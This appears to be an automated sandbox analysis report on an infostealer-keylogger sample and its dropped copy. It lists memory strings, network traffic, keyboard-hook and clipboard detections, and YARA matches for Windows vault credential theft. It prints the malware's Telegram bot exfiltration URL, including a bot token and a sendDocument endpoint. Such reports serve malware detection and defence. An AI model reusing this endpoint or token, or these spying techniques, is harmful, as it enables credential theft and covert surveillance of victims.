                      Source: z1E-catalogSamples.exe, 00000000.00000002.2101535049.00000000031EB000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.0000000003201000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 00000007.00000002.2139622475.000000000326F000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 0000000C.00000002.4526667510.00000000030E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: z1E-catalogSamples.exe, 00000000.00000002.2102047965.000000000437F000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4523979297.000000000042A000.00000040.00000400.00020000.00000000.sdmp, vZkoWbol.exe, 00000007.00000002.2140827658.0000000004400000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                      Source: z1E-catalogSamples.exe, 00000000.00000002.2102047965.000000000437F000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.0000000003201000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4523979297.000000000042A000.00000040.00000400.00020000.00000000.sdmp, vZkoWbol.exe, 00000007.00000002.2140827658.0000000004400000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 0000000C.00000002.4526667510.00000000030E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                      Source: vZkoWbol.exe, 0000000C.00000002.4526667510.00000000030E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                      Source: vZkoWbol.exe, 0000000C.00000002.4526667510.00000000030E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                      Source: z1E-catalogSamples.exe, 00000006.00000002.4526832028.000000000346A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram
                      Source: z1E-catalogSamples.exe, 00000006.00000002.4526832028.0000000003306000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.0000000003388000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.00000000036A3000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.000000000329A000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.000000000324B000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.00000000033E3000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.000000000346A000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 0000000C.00000002.4526667510.0000000003157000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 0000000C.00000002.4526667510.00000000031E2000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 0000000C.00000002.4526667510.000000000334D000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 0000000C.00000002.4526667510.000000000327E000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 0000000C.00000002.4526667510.0000000003178000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                      Source: z1E-catalogSamples.exe, 00000000.00000002.2102047965.000000000437F000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.0000000003201000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4523979297.000000000042A000.00000040.00000400.00020000.00000000.sdmp, vZkoWbol.exe, 00000007.00000002.2140827658.0000000004400000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 0000000C.00000002.4526667510.00000000030E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/
                      Source: z1E-catalogSamples.exe, 00000006.00000002.4526832028.0000000003306000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.0000000003388000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.00000000036A3000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.0000000003707000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.000000000329A000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.000000000324B000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.00000000033E3000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.000000000346A000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 0000000C.00000002.4526667510.0000000003157000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 0000000C.00000002.4526667510.00000000031E2000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 0000000C.00000002.4526667510.000000000334D000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 0000000C.00000002.4526667510.000000000327E000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 0000000C.00000002.4526667510.0000000003178000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument
                      Source: z1E-catalogSamples.exe, 00000006.00000002.4526832028.0000000003306000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.orgDAh
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                      Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49705 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49706 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49707 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49708 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49726 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49735 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49738 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Contains functionality to log keystrokes (.Net Source)
                      Source: 0.2.z1E-catalogSamples.exe.437f438.2.raw.unpack, n00.cs.Net Code: _9Pddo
                      Source: 0.2.z1E-catalogSamples.exe.43b9e58.1.raw.unpack, n00.cs.Net Code: _9Pddo
                      Installs a global keyboard hook
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\z1E-catalogSamples.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\vZkoWbol.exe
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeWindow created: window name: CLIPBRDWNDCLASS

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 0.2.z1E-catalogSamples.exe.43b9e58.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 7.2.vZkoWbol.exe.443ad98.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 7.2.vZkoWbol.exe.4400378.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.z1E-catalogSamples.exe.437f438.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 7.2.vZkoWbol.exe.443ad98.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 7.2.vZkoWbol.exe.4400378.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.z1E-catalogSamples.exe.43b9e58.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.z1E-catalogSamples.exe.437f438.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      .NET source code contains very large array initializations
                      Source: z1E-catalogSamples.exe, NominalArffToBin.csLarge array initialization: : array initializer size 616556
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeCode function: 0_2_065B00400_2_065B0040
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeCode function: 0_2_01619BF00_2_01619BF0
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeCode function: 0_2_0161E3680_2_0161E368
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeCode function: 6_2_0304A1506_2_0304A150
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeCode function: 6_2_030441786_2_03044178
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeCode function: 6_2_0304E0E16_2_0304E0E1
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeCode function: 6_2_03044A486_2_03044A48
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeCode function: 6_2_0304A9E06_2_0304A9E0
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeCode function: 6_2_03043E306_2_03043E30
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeCode function: 6_2_0304DC686_2_0304DC68
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeCode function: 6_2_06CD8B8C6_2_06CD8B8C
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeCode function: 6_2_06CD1BA86_2_06CD1BA8
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeCode function: 6_2_06CD1BA36_2_06CD1BA3
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeCode function: 6_2_06CE65C86_2_06CE65C8
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeCode function: 6_2_06CE55A86_2_06CE55A8
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeCode function: 6_2_06CEB2B96_2_06CEB2B9
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeCode function: 6_2_06CE23506_2_06CE2350
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeCode function: 6_2_06CEC1686_2_06CEC168
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeCode function: 6_2_06CE7D606_2_06CE7D60
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeCode function: 6_2_06CE76806_2_06CE7680
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeCode function: 6_2_06CEE3886_2_06CEE388
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeCode function: 6_2_06CE00406_2_06CE0040
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeCode function: 6_2_06CE00066_2_06CE0006
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeCode function: 6_2_06CE5CC86_2_06CE5CC8
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeCode function: 6_2_06CE03426_2_06CE0342
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeCode function: 7_2_0312E3687_2_0312E368
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeCode function: 7_2_0663A5C87_2_0663A5C8
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeCode function: 7_2_066344487_2_06634448
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeCode function: 7_2_066344317_2_06634431
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeCode function: 7_2_066364A77_2_066364A7
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeCode function: 7_2_066364B87_2_066364B8
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeCode function: 7_2_06634CB67_2_06634CB6
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeCode function: 7_2_06634CB87_2_06634CB8
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeCode function: 7_2_066368E07_2_066368E0
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeCode function: 7_2_066368F07_2_066368F0
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeCode function: 7_2_066348807_2_06634880
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeCode function: 12_2_013D417812_2_013D4178
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeCode function: 12_2_013DE0E112_2_013DE0E1
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeCode function: 12_2_013DD95012_2_013DD950
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeCode function: 12_2_013D4A4812_2_013D4A48
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeCode function: 12_2_013D3E3012_2_013D3E30
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeCode function: 12_2_06D48B8C12_2_06D48B8C
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeCode function: 12_2_06D41BA312_2_06D41BA3
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeCode function: 12_2_06D41BA812_2_06D41BA8
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeCode function: 12_2_06D565C812_2_06D565C8
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeCode function: 12_2_06D555A812_2_06D555A8
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeCode function: 12_2_06D5B2B912_2_06D5B2B9
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeCode function: 12_2_06D5307012_2_06D53070
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeCode function: 12_2_06D5C16812_2_06D5C168
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeCode function: 12_2_06D57D6012_2_06D57D60
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeCode function: 12_2_06D5768012_2_06D57680
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeCode function: 12_2_06D5E38812_2_06D5E388
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeCode function: 12_2_06D5234212_2_06D52342
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeCode function: 12_2_06D5004012_2_06D50040
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeCode function: 12_2_06D55CB712_2_06D55CB7
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeCode function: 12_2_06D5000612_2_06D50006
                      Source: z1E-catalogSamples.exeBinary or memory string: OriginalFilename vs z1E-catalogSamples.exe
                      Source: z1E-catalogSamples.exe, 00000000.00000002.2101535049.0000000003141000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs z1E-catalogSamples.exe
                      Source: z1E-catalogSamples.exe, 00000000.00000002.2101535049.00000000031EB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamebb634632-562a-4a42-9009-a1faa07fc1d1.exe4 vs z1E-catalogSamples.exe
                      Source: z1E-catalogSamples.exe, 00000000.00000000.2055190218.0000000000CAE000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameVKdc.exe4 vs z1E-catalogSamples.exe
                      Source: z1E-catalogSamples.exe, 00000000.00000002.2104061408.0000000005C60000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs z1E-catalogSamples.exe
                      Source: z1E-catalogSamples.exe, 00000000.00000002.2104574579.0000000006530000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs z1E-catalogSamples.exe
                      Source: z1E-catalogSamples.exe, 00000000.00000002.2102047965.000000000437F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamebb634632-562a-4a42-9009-a1faa07fc1d1.exe4 vs z1E-catalogSamples.exe
                      Source: z1E-catalogSamples.exe, 00000000.00000002.2102047965.000000000437F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs z1E-catalogSamples.exe
                      Source: z1E-catalogSamples.exe, 00000000.00000002.2099951927.000000000125E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs z1E-catalogSamples.exe
                      Source: z1E-catalogSamples.exe, 00000006.00000002.4523979297.000000000043C000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenamebb634632-562a-4a42-9009-a1faa07fc1d1.exe4 vs z1E-catalogSamples.exe
                      Source: z1E-catalogSamples.exe, 00000006.00000002.4524235462.0000000000FD9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs z1E-catalogSamples.exe
                      Source: z1E-catalogSamples.exeBinary or memory string: OriginalFilenameVKdc.exe4 vs z1E-catalogSamples.exe
                      Source: z1E-catalogSamples.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 0.2.z1E-catalogSamples.exe.43b9e58.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 7.2.vZkoWbol.exe.443ad98.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 7.2.vZkoWbol.exe.4400378.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.z1E-catalogSamples.exe.437f438.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 7.2.vZkoWbol.exe.443ad98.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 7.2.vZkoWbol.exe.4400378.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.z1E-catalogSamples.exe.43b9e58.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.z1E-catalogSamples.exe.437f438.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: z1E-catalogSamples.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: vZkoWbol.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 0.2.z1E-catalogSamples.exe.437f438.2.raw.unpack, NpXw3kw.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.z1E-catalogSamples.exe.437f438.2.raw.unpack, NpXw3kw.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 0.2.z1E-catalogSamples.exe.437f438.2.raw.unpack, gyfrCFT5x9I.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.z1E-catalogSamples.exe.437f438.2.raw.unpack, gyfrCFT5x9I.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.z1E-catalogSamples.exe.437f438.2.raw.unpack, gyfrCFT5x9I.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.z1E-catalogSamples.exe.437f438.2.raw.unpack, gyfrCFT5x9I.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.z1E-catalogSamples.exe.437f438.2.raw.unpack, fpnV0Qjz.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.z1E-catalogSamples.exe.437f438.2.raw.unpack, fpnV0Qjz.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.z1E-catalogSamples.exe.44a8310.3.raw.unpack, qf3KIIPkQkHyoPCAGD.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.z1E-catalogSamples.exe.44a8310.3.raw.unpack, qf3KIIPkQkHyoPCAGD.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.z1E-catalogSamples.exe.44a8310.3.raw.unpack, qf3KIIPkQkHyoPCAGD.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.z1E-catalogSamples.exe.44a8310.3.raw.unpack, WeRTmg58MlbmW9GQYv.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: z1E-catalogSamples.exe, vZkoWbol.exe.0.drBinary or memory string: M.slNL
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@18/11@3/2
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeFile created: C:\Users\user\AppData\Roaming\vZkoWbol.exeJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7280:120:WilError_03
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3868:120:WilError_03
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeMutant created: \Sessions\1\BaseNamedObjects\OBsYgLyXXGCDPGkEKBj
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2640:120:WilError_03
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeFile created: C:\Users\user\AppData\Local\Temp\PO_00UT11Jump to behavior
                      Source: z1E-catalogSamples.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: z1E-catalogSamples.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
